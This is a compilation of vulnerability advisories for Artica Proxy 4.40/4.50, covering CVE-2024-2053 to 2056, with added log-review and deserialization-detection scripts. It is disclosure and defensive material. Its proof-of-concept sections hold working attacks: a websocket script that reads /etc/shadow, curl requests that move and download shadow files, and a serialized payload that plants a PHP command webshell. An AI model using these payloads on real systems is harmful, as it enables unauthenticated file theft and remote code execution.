<pre><code>KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated<br /><br />Title: Artica Proxy Loopback Services Remotely Accessible Unauthenticated<br />Advisory ID: KL-001-2024-004<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-288: Authentication Bypass Using an<br /> Alternate Path or Channel, CWE-552: Files<br /> or Directories Accessible to External<br /> Parties<br /> CVE ID: CVE-2024-2056<br /><br /><br />2. Vulnerability Description<br /><br /> Services that are running and bound to the loopback<br /> interface on the Artica Proxy are accessible through<br /> the proxy service. In particular, the "tailon" service is<br /> running as the root user, is bound to the loopback interface,<br /> and is listening on TCP port 7050. Security issues associated<br /> with exposing this network service are documented at<br /> https://github.com/gvalkov/tailon#security. Using the tailon<br /> service, the contents of any file on the Artica Proxy can be<br /> viewed.<br /><br /><br />3. 
Technical Description<br /><br /> root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 " " $7 }'<br /> 127.0.0.1:57585 <PID>/(squid-1)<br /> 127.0.0.1:8562 <PID>/nginx:<br /> 127.0.0.1:884 <PID>/sshd<br /> 127.0.0.55:53 <PID>/dnscache<br /> 127.0.0.1:9143 <PID>/[authlog]<br /> 127.0.0.1:5432 <PID>/postgres<br /> 127.0.0.1:2521 <PID>/artica-smtpd<br /> 127.0.0.1:2874 <PID>/monit<br /> 127.0.0.1:19102 <PID>/[cache-tail]<br /> 127.0.0.1:3333 <PID>/go-shield-serv<br /> 127.0.0.1:389 <PID>/slapd<br /> 127.0.0.1:3334 <PID>/go-exec<br /> 127.0.0.1:7050 <PID>/tailon<br /> :::4949 <PID>/perl<br /> :::9025 <PID>/[error-page]<br /><br /> root@artica-450:~# ps -efww | grep tailon<br /> root 2765 1 0 Nov07 ? 00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml <br />alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log <br />alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor; no remediation available.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher and Jaggar<br /> Henry of KoreLogic, Inc.<br /><br /><br />6. 
Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2056 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. 
Proof of Concept<br /><br /> $ python3 exploit.py 192.168.2.139 /etc/shadow<br /> 1701282189.746 35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 - <br />mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A <br />exterr=\\\"-|-\\\"<br />root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::<br /> daemon:*:19507:0:99999:7:::<br /> bin:*:19507:0:99999:7:::<br /> sys:*:19507:0:99999:7:::<br /> sync:*:19507:0:99999:7:::<br /> games:*:19507:0:99999:7:::<br /> man:*:19507:0:99999:7:::<br /> ...<br /> ...<br /><br /><br /> ### exploit.py<br /><br /> import re<br /> import sys<br /> import json<br /> import websocket<br /><br /> """<br /> run `pip install websocket-client` before executing.<br /> """<br /><br /> ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1'<br /> FILE_TO_READ = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd'<br /> WEBSOCKET_URI = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'<br /><br /> payload = {<br /> 'command': 'sed',<br /> 'script': f'r {FILE_TO_READ}',<br /> 'entry': {<br /> 'path': '/var/log/squid/access.log',<br /> 'alias': 'Proxy/access.log',<br /> },<br /> 'nlines': 1<br /> }<br /><br /> websocket_message = json.dumps([json.dumps(payload)])<br /><br /> ws = websocket.WebSocket()<br /> ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http')<br /> ws.send(websocket_message)<br /><br /> reading = True<br /> while reading:<br /> data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())<br /> if data: print(data.group(1))<br /><br /> ws.close()<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. 
and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
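<p>The exposure described above leaves a trace in Squid's own access.log: the proof of concept produces a TCP_TUNNEL line for a CONNECT to 0.0.0.0:7050. The script that follows is an added example, not part of the KoreLogic advisory and not Artica's code; it parses lines in Squid's native access.log layout and reports every request whose requested host, or the peer Squid actually connected to, is a loopback or unspecified address. The sample lines are constructed (only the first mirrors the tunnel quoted in the advisory), and the field order assumed is Squid's default native format.</p>

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log layout
# (time elapsed client action/code bytes method url ident hierarchy/peer type).
# Only the first line mirrors the tunnel shown in the advisory; the rest are made up.
SAMPLE_ACCESS_LOG = """\
1701282189.746 35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 -
1701282190.001 120 192.168.2.99 TCP_TUNNEL/200 5120 CONNECT 127.0.0.1:5432 - HIER_DIRECT/127.0.0.1:5432 -
1701282191.500 80 192.168.2.50 TCP_MISS/200 2048 GET http://localhost:7050/tailon/ - HIER_DIRECT/127.0.0.1 text/html
1701282192.250 40 192.168.2.50 TCP_TUNNEL/200 9876 CONNECT [::1]:389 - HIER_DIRECT/::1 -
1701282193.000 300 192.168.2.60 TCP_TUNNEL/200 40210 CONNECT example.com:443 - HIER_DIRECT/198.51.100.10:443 -
1701282194.000 10 192.168.2.60 TCP_MISS/200 512 GET http://example.com/index.html - HIER_DIRECT/198.51.100.10 text/html
"""


def host_of(target: str) -> str:
    """Host part of 'host:port', '[v6]:port', a bare address, or an absolute URL."""
    if "://" in target:
        return urlsplit(target).hostname or ""
    if target.startswith("["):
        return target[1:].split("]", 1)[0]
    if target.count(":") > 1:            # bare IPv6 literal, no brackets, no port
        return target
    return target.split(":", 1)[0]


def is_internal_host(host: str) -> bool:
    """True for loopback or unspecified addresses and the localhost name."""
    if host.lower() in ("localhost", "localhost.localdomain"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def parse_access_line(line: str):
    """Pick the fields this check needs out of one native-format line; None if malformed."""
    f = line.split()
    if len(f) < 9:
        return None
    return {"client": f[2], "method": f[5], "url": f[6],
            "peer": f[8].split("/", 1)[1] if "/" in f[8] else ""}


def find_internal_tunnels(log_text: str):
    """(client, method, destination) for every request that reached an internal host,
    judged first by the requested host and then by the peer Squid connected to."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        requested = host_of(rec["url"])
        peer = host_of(rec["peer"]) if rec["peer"] else ""
        if is_internal_host(requested):
            hits.append((rec["client"], rec["method"], requested))
        elif is_internal_host(peer):
            hits.append((rec["client"], rec["method"], peer))
    return hits


if __name__ == "__main__":
    for client, method, dest in find_internal_tunnels(SAMPLE_ACCESS_LOG):
        print(f"{client} {method} -> {dest}")
```

<p>Squid's stock configuration already defines <code>acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1</code> and recommends <code>http_access deny to_localhost</code>; the advisory does not say whether Artica's generated squid.conf applies that rule, so the running configuration is the first thing to check, and the log review above tells you whether the gap has already been used from a client network.</p>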
<pre><code>KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability<br /><br />Title: Artica Proxy Unauthenticated File Manager Vulnerability<br />Advisory ID: KL-001-2024-003<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.40 and 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-288: Authentication Bypass Using an<br /> Alternate Path or Channel, CWE-552: Files<br /> or Directories Accessible to External<br /> Parties<br /> CVE ID: CVE-2024-2055<br /><br /><br />2. Vulnerability Description<br /><br /> The "Rich Filemanager" feature of Artica Proxy provides a<br /> web-based interface for file management capabilities. When<br /> the feature is enabled, it does not require authentication by<br /> default, and runs as the root user.<br /><br /><br />3. Technical Description<br /><br /> The Artica Proxy can be installed with a small number of<br /> "Features" enabled. Within the administrative web interface,<br /> additional features can be installed, enabled, and disabled. The<br /> "Rich Filemanager" feature is disabled by default. Enabling<br /> this feature will spawn a listener on port 5000/tcp bound to<br /> 0.0.0.0. By default, when this feature is enabled, authentication<br /> is not required to access the web interface. The "Rich<br /> Filemanager" runs as the root user. This provides an<br /> unauthenticated attacker complete access to the file system.<br /><br /> root@artica:~# ps -efww | grep -i File<br /> root 1888 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER<br /> root 1889 1885 0 09:13 ? 
00:00:00 php-fpm: pool RICHFILEMANAGER<br /><br /> This can be exploited by an attacker to add entries into<br /> /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create<br /> an additional root-level account that has the ability to SSH<br /> into the system.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor. The Rich Filemanager feature is disabled<br /> by default. Leave it that way.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of KoreLogic,<br /> Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! 
issues CVE-2024-2055 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> Step 1: Move /etc/shadow to /tmp/shadow<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' <br />-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H <br />$'Connection: close' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'<br /><br />{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 <br />Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}<br /><br /> Step 2: Download /tmp/shadow<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H <br />$'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H <br />$'Cache-Control: no-cache' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'<br /><br />root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::<br /> daemon:*:19507:0:99999:7:::<br /> bin:*:19507:0:99999:7:::<br /> sys:*:19507:0:99999:7:::<br /> sync:*:19507:0:99999:7:::<br /> games:*:19507:0:99999:7:::<br /> man:*:19507:0:99999:7:::<br /> lp:*:19507:0:99999:7:::<br /> mail:*:19507:0:99999:7:::<br /> news:*:19507:0:99999:7:::<br /> uucp:*:19507:0:99999:7:::<br /> proxy:*:19507:0:99999:7:::<br /> www-data:*:19507:0:99999:7:::<br /> backup:*:19507:0:99999:7:::<br /> list:*:19507:0:99999:7:::<br /> irc:*:19507:0:99999:7:::<br 
/> gnats:*:19507:0:99999:7:::<br /> nobody:*:19507:0:99999:7:::<br /> _apt:*:19507:0:99999:7:::<br /> systemd-timesync:*:19507:0:99999:7:::<br /> systemd-network:*:19507:0:99999:7:::<br /> systemd-resolve:*:19507:0:99999:7:::<br /> messagebus:*:19507:0:99999:7:::<br /> quagga:*:19507:0:99999:7:::<br /> apt-mirror:*:19507:0:99999:7:::<br /> privoxy:*:19507:0:99999:7:::<br /> ntp:*:19507:0:99999:7:::<br /> redsocks:!:19507:0:99999:7:::<br /> prads:*:19507:0:99999:7:::<br /> freerad:*:19507:0:99999:7:::<br /> vnstat:*:19507:0:99999:7:::<br /> stunnel4:!:19507:0:99999:7:::<br /> sshd:*:19507:0:99999:7:::<br /> vde2-net:*:19507:0:99999:7:::<br /> memcache:!:19507:0:99999:7:::<br /> davfs2:*:19507:0:99999:7:::<br /> ziproxy:!:19507:0:99999:7:::<br /> proftpd:!:19507:0:99999:7:::<br /> ftp:*:19507:0:99999:7:::<br /> mosquitto:*:19507:0:99999:7:::<br /> openldap:!:19507:0:99999:7:::<br /> munin:*:19507:0:99999:7:::<br /> msmtp:*:19507:0:99999:7:::<br /> Debian-snmp:!:19507:0:99999:7:::<br /> opendkim:*:19507:0:99999:7:::<br /> avahi:*:19507:0:99999:7:::<br /> glances:*:19507:0:99999:7:::<br /> ArticaStats:!:19507:0:99999:7:::<br /> netdata:!:19507:0:99999:7:::<br /> mysql:!:19507:0:99999:7:::<br /> postfix:!:19507:0:99999:7:::<br /> squid:!:19507:0:99999:7:::<br /> smokeping:!:19507:0:99999:7:::<br /> unbound:!:19645:0:99999:7:::<br /><br /> Step 3: Move /tmp/shadow back to /etc/shadow so as not to create a DoS condition<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' <br />-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H <br />$'Connection: close' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'<br /><br 
/>{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 <br />Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability<br /><br />Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability<br />Advisory ID: KL-001-2024-002<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-502 Deserialization of Untrusted Data<br /> CVE ID: CVE-2024-2054<br /><br /><br />2. Vulnerability Description<br /><br /> The Artica Proxy administrative web application will deserialize<br /> arbitrary PHP objects supplied by unauthenticated users and<br /> subsequently enable code execution as the "www-data" user.<br /><br /><br />3. Technical Description<br /><br /> Prior to authentication, a user can send an HTTP request<br /> to the "/wizard/wiz.wizard.progress.php" endpoint. This<br /> endpoint processes the "build-js" query parameter by base64<br /> decoding the provided value and then calling the "unserialize"<br /> PHP function with the decoded value as input.<br /><br /> Code snippet from "wiz.wizard.progress.php":<br /><br /> if(isset($_GET["build-js"])){buildjs();exit;}<br /> ...<br /> $ARRAY=unserialize(base64_decode($_GET["build-js"]));<br /><br /> To exploit this vulnerability, a user can leverage the<br /> installed "Net_DNS2" library autoloader to instantiate the<br /> "Net_DNS2_Cache_File" class. 
The "__destruct" method<br /> within this class writes to the file named by the<br /> deserialized object's cache_file property:<br /><br /> public function __destruct()<br /> {<br /> //<br /> // if there's no cache file set, then there's nothing to do<br /> //<br /> if (strlen($this->cache_file) == 0) {<br /> return;<br /> }<br /><br /> //<br /> // open the file for reading/writing<br /> //<br /> $fp = fopen($this->cache_file, 'a+');<br /> if ($fp !== false) {<br /> ...<br /> if (!is_null($data)) {<br /><br /> //<br /> // write the file contents<br /> //<br /> fwrite($fp, $data);<br /> }<br /><br /> An unauthenticated user can overwrite existing files and<br /> insert a webshell to execute malicious PHP as the "www-data"<br /> user.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor. This vulnerability can be remediated<br /> by deleting the '/usr/share/artica-postfix/wizard' directory<br /> if it is not needed. Otherwise, move it to a location outside<br /> of the web root.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jaggar Henry of KoreLogic,<br /> Inc.<br /><br /><br />6. 
Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2054 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. 
Proof of Concept<br /><br /> To overwrite the "wiz.upload.php" file to contain a PHP<br /> webshell, the following serialized object can be base64<br /> encoded and submitted via the "build-js" query parameter:<br /><br />O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php <br />system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}<br /><br /> $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k <br />"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" <br />&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";<br /><br /> {"uid=33(www-data) gid=33(www-data) groups=33(www-data)<br /> ":{"cache_date":1696883506,"ttl":8303116493}}<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
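<p>The defect is the single call quoted in section 3, unserialize(base64_decode($_GET["build-js"])). The script that follows is an added example, not Artica's code and not KoreLogic's proof of concept: it decodes a build-js value the same way the endpoint does and parses the PHP serialization format far enough to list the classes that unserialize() would instantiate, which is what a log review or a WAF rule needs in order to flag objects arriving at a parameter whose result is assigned to a variable named $ARRAY. The samples are constructed; the suspicious one reuses only the class name from the advisory, with harmless property values, and the assumption that a legitimate value would be a plain array is mine.</p>

```python
import base64
from dataclasses import dataclass, field
from urllib.parse import parse_qs, quote, unquote


@dataclass
class PhpObject:
    """An object in the serialized stream: class name plus its properties."""
    cls: str
    props: dict = field(default_factory=dict)


def _read_until(data: bytes, i: int, stop: bytes):
    j = data.index(stop, i)
    return data[i:j], j + 1


def _parse(data: bytes, i: int):
    """Parse one PHP-serialized value at offset i; return (value, offset after it)."""
    tag = data[i:i + 1]
    if tag == b"N":                                    # N;
        return None, i + 2
    if tag in (b"b", b"i", b"d"):                      # b:1;  i:42;  d:1.5;
        raw, i = _read_until(data, i + 2, b";")
        if tag == b"b":
            return raw == b"1", i
        return (int(raw) if tag == b"i" else float(raw)), i
    if tag == b"s":                                    # s:<bytes>:"...";
        raw, i = _read_until(data, i + 2, b":")
        n = int(raw)                                   # i now points at the opening quote
        return data[i + 1:i + 1 + n].decode("utf-8", "replace"), i + 1 + n + 2
    if tag == b"a":                                    # a:<count>:{key;value;...}
        raw, i = _read_until(data, i + 2, b":")
        return _parse_pairs(data, i + 1, int(raw), {})
    if tag == b"O":                                    # O:<len>:"Class":<count>:{...}
        raw, i = _read_until(data, i + 2, b":")
        n = int(raw)
        obj = PhpObject(data[i + 1:i + 1 + n].decode("utf-8", "replace"))
        raw, i = _read_until(data, i + 1 + n + 2, b":")
        _, i = _parse_pairs(data, i + 1, int(raw), obj.props)
        return obj, i
    raise ValueError(f"unsupported type tag {tag!r} at offset {i}")


def _parse_pairs(data: bytes, i: int, count: int, into: dict):
    for _ in range(count):
        key, i = _parse(data, i)
        value, i = _parse(data, i)
        into[key] = value
    if data[i:i + 1] != b"}":
        raise ValueError(f"expected '}}' at offset {i}")
    return into, i + 1


def find_classes(value) -> list:
    """Class names of every object in a parsed value, outermost first."""
    found = []
    if isinstance(value, PhpObject):
        found.append(value.cls)
        value = value.props
    if isinstance(value, dict):
        for k, v in value.items():
            found += find_classes(k) + find_classes(v)
    return found


def classes_in_build_js(param_value: str) -> list:
    """Decode a build-js value the way the endpoint does (URL-decode, then base64-decode)
    and report the classes unserialize() would instantiate; [] means array or scalar only."""
    data = base64.b64decode(unquote(param_value))
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after the serialized value")
    return find_classes(value)


def audit_query_string(query: str):
    """None when the query string carries no build-js parameter, else its class list."""
    values = parse_qs(query).get("build-js")
    return classes_in_build_js(values[0]) if values else None


# Constructed samples: a plain array (assumed to be what code that assigns the result
# to $ARRAY expects) and an object graph that reuses only the class name from the
# advisory, with harmless property values.
BENIGN = b'a:2:{s:4:"step";i:3;s:4:"lang";s:2:"en";}'
SUSPICIOUS = (b'O:19:"Net_DNS2_Cache_File":2:{s:10:"cache_file";s:23:"/tmp/constructed-sample";'
              b's:10:"cache_data";a:1:{s:1:"k";O:8:"stdClass":0:{}}}')
BENIGN_B64 = base64.b64encode(BENIGN).decode()
SUSPICIOUS_B64 = base64.b64encode(SUSPICIOUS).decode()
SUSPICIOUS_QUERY = "build-js=" + quote(SUSPICIOUS_B64, safe="")

if __name__ == "__main__":
    print("benign     ->", classes_in_build_js(BENIGN_B64))
    print("suspicious ->", audit_query_string(SUSPICIOUS_QUERY))
```

<p>The fix that removes the bug class is never calling unserialize() on request data: json_decode() for structured input, or, where unserialize() has to stay, its allowed_classes option set to false (PHP 7.0 and later) so that no object, and therefore no __destruct or __wakeup method, is ever instantiated from the request.</p>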
<pre><code>KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability<br /><br />Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability<br />Advisory ID: KL-001-2024-001<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.40 and 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-23: Relative Path Traversal<br /> CVE ID: CVE-2024-2053<br /><br /><br />2. Vulnerability Description<br /><br /> The Artica Proxy administrative web application attempts to<br /> prevent local file inclusion. These protections can be bypassed<br /> and arbitrary file requests supplied by unauthenticated<br /> users will be returned according to the privileges of the<br /> "www-data" user.<br /><br /><br />3. Technical Description<br /><br /> Prior to authentication, a user can send an HTTP request to<br /> the "images.listener.php" endpoint. This endpoint processes<br /> the "mailattach" query parameter and concatenates the user<br /> supplied value to the "/opt/artica/share/www/attachments/"<br /> file path. 
The contents of the file located at the newly<br /> created path are returned in the HTTP response body.<br /><br /> The "images.listener.php" endpoint attempts to prevent<br /> a local file inclusion vulnerability by stripping strings<br /> that attempt to traverse into the parent directory from<br /> the user supplied "mailattach" value:<br /><br />$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);<br />$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";<br /> header("Content-type: application/force-download" );<br /> header("Content-Disposition: attachment; \<br /> filename=\"{$_GET["mailattach"]}\"");<br /> header("Content-Length: ".filesize($file)."" );<br /> header("Expires: 0" );<br /> readfile($file);<br /><br /> If effective, this approach would limit files<br /> accessible by this endpoint to those within the<br /> "/opt/artica/share/www/attachments/" directory. 